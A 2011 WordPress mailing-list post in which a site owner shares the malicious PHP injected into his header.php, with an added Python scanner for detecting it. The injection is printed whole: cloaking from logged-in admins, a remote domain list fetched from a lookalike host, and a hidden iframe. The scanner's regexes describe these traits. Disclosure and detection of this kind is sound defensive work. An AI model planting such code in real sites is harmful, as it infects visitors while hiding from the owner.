[wp-hackers] Malware infestation ensures the admin can't encounter malware code via header.php

Raj Sekharan flarecore at gmail.com
Fri Oct 7 08:22:31 UTC 2011


My website was recently compromised, and my header.php file was appended
with the following code:

<!-- Wordpress Counter -->
<?php
if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
 if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain =
get_new_domain() ) ) {
 add_option ( 'domain', $newdomain, '', 'no' );
add_option ( 'domain_update', time (), '', 'no' );
 }
if ( time () - get_option ( 'domain_update' ) > 10*60 && ( $newdomain =
get_new_domain() ) ) {
 update_option ( 'domain', $newdomain );
update_option ( 'domain_update', time () );
 }

$domain = get_option ( 'domain' );
if ($domain)
 echo
'<script language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");

function SetCookie (name, value) {
 var argv = SetCookie.arguments;
 var argc = SetCookie.arguments.length;
 var expires = (argc > 2) ? argv[2] : null;
 var path = (argc > 3) ? argv[3] : null;
 var domain = (argc > 4) ? argv[4] : null;
 var secure = (argc > 5) ? argv[5] : false;
 document.cookie = name + "=" + escape (value) +
 ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
 ((path == null) ? "" : ("; path=" + path)) +
 ((domain == null) ? "" : ("; domain=" + domain)) +
 ((secure == true) ? "; secure" : "");
}
</script>
<iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1"
frameborder="0">
</iframe>';
}

function get_new_domain () {
$url = 'http://googlesafebrowsing.com/remoted.cc.txt';
 if ( function_exists ( 'curl_init' ) ) {
$ch = @curl_init ( $url );
 @curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
$doms = @curl_exec ( $ch );
 @curl_close ( $ch );
}
else
 $doms = @file_get_contents ( $url );
 if ( strpos ( $doms, '||' ) === false )
  return false;

$domains = explode ( '||', trim ( $doms ) );
 return $domains[array_rand ( $domains )];
}
?>

<!-- Wordpress Counter -->

Unlike before, where a dummy iframe was just appended, this one ensures that
the logged-in administrator cannot actually encounter the malware code. The
attacker even called it "WordPress Counter" in the comment.
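The cloaking trick described in this post (serve the iframe only to visitors who are not logged in and do not yet carry the marker cookie, rotate the iframe domain from a remotely fetched list, persist it in wp_options) leaves a recognisable fingerprint in the PHP source. The following scanner is an added example and not code from the post; it checks a theme file for those traits together and is meant for a defender cleaning up or auditing a site. The two sample file contents (`INFECTED_HEADER`, `CLEAN_HEADER`) are constructed for the demo, with placeholder host and script names where the post shows the real ones.

```python
"""Indicator scanner for the cloaked header.php injection described in the
post. Added example, not the post's own code. The sample inputs below are
constructed; hosts and script names are placeholders."""
import re
from pathlib import Path
from typing import Dict, List

# One indicator alone (a negated is_user_logged_in(), say) is normal WordPress
# code. The combination of cloaking plus an injected payload is the signature.
INDICATORS: Dict[str, re.Pattern] = {
    "cloak_on_login": re.compile(r"!\s*is_user_logged_in\s*\(\s*\)"),
    "marker_cookie": re.compile(r"\$_COOKIE\s*\[\s*['\"]MTPT['\"]\s*\]"),
    "hidden_iframe": re.compile(
        r"<iframe[^>]*width=['\"]?1['\"]?[^>]*height=['\"]?1['\"]?", re.I | re.S),
    "remote_domain_list": re.compile(
        r"explode\s*\(\s*['\"]\|\|['\"].*?array_rand", re.S),
    "suppressed_fetch": re.compile(r"@\s*(curl_exec|file_get_contents)\s*\("),
    "option_persistence": re.compile(
        r"(add|update|get)_option\s*\(\s*['\"]domain(_update)?['\"]"),
}


def scan_source(source: str) -> List[str]:
    """Return the names of all indicators present in one file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def verdict(hits: List[str]) -> str:
    """Cloaking combined with an injected iframe or a remote domain list is the
    signature seen in the post; two or more weaker hits merit a manual look."""
    cloaked = "cloak_on_login" in hits or "marker_cookie" in hits
    payload = "hidden_iframe" in hits or "remote_domain_list" in hits
    if cloaked and payload:
        return "malicious"
    if len(hits) >= 2:
        return "suspicious"
    return "clean"


def scan_directory(root: str) -> Dict[str, str]:
    """Scan every .php file under root (e.g. wp-content/themes) and map each
    path to its verdict. Files that fail to read are reported as 'unreadable'."""
    results: Dict[str, str] = {}
    for path in Path(root).rglob("*.php"):
        try:
            results[str(path)] = verdict(scan_source(path.read_text(errors="replace")))
        except OSError:
            results[str(path)] = "unreadable"
    return results


# Constructed sample modelled on the injection in the post (placeholder names).
INFECTED_HEADER = """<!-- Wordpress Counter -->
<?php
if ( !is_user_logged_in() && !isset( $_COOKIE['MTPT'] ) ) {
    if ( get_option( 'domain_update' ) === FALSE && ( $newdomain = get_new_domain() ) ) {
        add_option( 'domain', $newdomain, '', 'no' );
    }
    $domain = get_option( 'domain' );
    if ( $domain )
        echo '<iframe src="http://' . $domain . '/payload.php" width="1" height="1" frameborder="0"></iframe>';
}
function get_new_domain() {
    $doms = @file_get_contents( 'http://list.example.invalid/domains.txt' );
    if ( strpos( $doms, '||' ) === false ) return false;
    $domains = explode( '||', trim( $doms ) );
    return $domains[array_rand( $domains )];
}
?>
"""

# Constructed clean theme header: uses is_user_logged_in() legitimately.
CLEAN_HEADER = """<?php wp_head(); ?>
<header>
<h1><?php bloginfo( 'name' ); ?></h1>
<?php if ( is_user_logged_in() ) { echo '<a href="' . wp_logout_url() . '">Log out</a>'; } ?>
</header>
"""

if __name__ == "__main__":
    for label, src in (("infected", INFECTED_HEADER), ("clean", CLEAN_HEADER)):
        hits = scan_source(src)
        print(f"{label}: {verdict(hits)} {hits}")
```

Point `scan_directory()` at a theme directory to sweep every PHP file; the regexes are deliberately loose about whitespace and quoting because re-injected copies of this kind of code are often reindented or minified. A hit on `option_persistence` is also a cue to inspect the `domain` and `domain_update` rows in wp_options, which the file cleanup alone does not remove.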

